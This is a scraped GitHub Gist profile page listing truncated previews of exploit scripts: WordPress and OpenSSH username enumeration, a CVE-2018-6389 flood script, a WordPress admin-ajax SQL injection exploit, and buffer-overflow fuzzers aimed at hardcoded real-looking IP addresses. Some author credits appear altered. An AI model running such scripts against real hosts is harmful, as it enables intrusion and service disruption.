Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
View GitHub Profile
#!/usr/bin/env python3.3
# -*- coding: utf8 -*-
#
# Read input from NMap and use the information from cve-search and
# Toolswatch DPE (Default Password Enumeration) list to provide a list of
# possible ways a system might be misconfigured or vulnerable.
# Imports
import os
import sys
# Exploit Title : Wordpress 5.3 - User Disclosure
# Author: Pwn0sec
# Date: 2020-08-12
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7
# CVE: N/A
#!/usr/bin/python
@andripwn
andripwn / CVE-2016-6210.py
Created August 1, 2020 06:02
OpenSSH 7.2p2 - Username Enumeration
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to Andri Wahyudi)
#
# Author: 0_o -- null_null
# server.0day [at] gmail.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2020-08-01
#!/usr/bin/env python3.3
# -*- coding: utf8 -*-
# Imports
import argparse
import json
import os
import sys
runpath=os.path.dirname(os.path.realpath(__file__))
@andripwn
andripwn / telcoscan.php
Created July 27, 2020 15:16
Simple PHP Script to check telco provider of any Malaysian phone number.
#!/usr/bin/env php
<?php
/**
* Coded by Duck Research
* 27 July 2020
*
* Check phone number telco using HLRLookup.
* API Documentation: https://www.hlr-lookups.com/en/api-docs
*/
<?php
/**
* Website: http://sourceforge.net/projects/simplehtmldom/
* Additional projects that may be used: http://sourceforge.net/projects/debugobject/
* Acknowledge: Jose Solorzano (https://sourceforge.net/projects/php-html/)
* Contributions by:
* Duck Research (Attribute filters)
* Chickflow (Negative indexes supports of "find" method)
* 0x1_aulia (Constructor with automatically load contents either text or file/url)
*
@andripwn
andripwn / CVE-2018-6389.py
Created July 21, 2020 22:16
CVE-2018-6389 Exploitation /wp-admin/
import requests
import threading
import random
ban = """
01000011 01010110 01000101 00101101 00110010
00110000 00110001 00111000 00101101 00110110
00110011 00111000 00111001 01000101 01111000
01110000 01101100 01101111 01101001 01110100
"""
#!/usr/bin/python
#https://github.com/gh0x0st
#gh0x0st@protonmail.com
import sys,socket
address = '46.31.116.71'
port = 3389
buffer = ['\x41']
counter = 100
while len(buffer)<= 10:
#!/usr/bin/python
#https://github.com/gh0x0st
#gh0x0st@protonmail.com
import sys,socket
address = '107.22.193.119'
port = 9999
buffer = ['\x41']
counter = 1000
while len(buffer)<= 100:
@andripwn
andripwn / WSQL.php
Created June 27, 2020 08:02
2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Andri Wahyudi "Pwn0sec"
// http://www.pwn0day.com/
// 27. June 2020
///////////////////////////////////////////////////////////////////////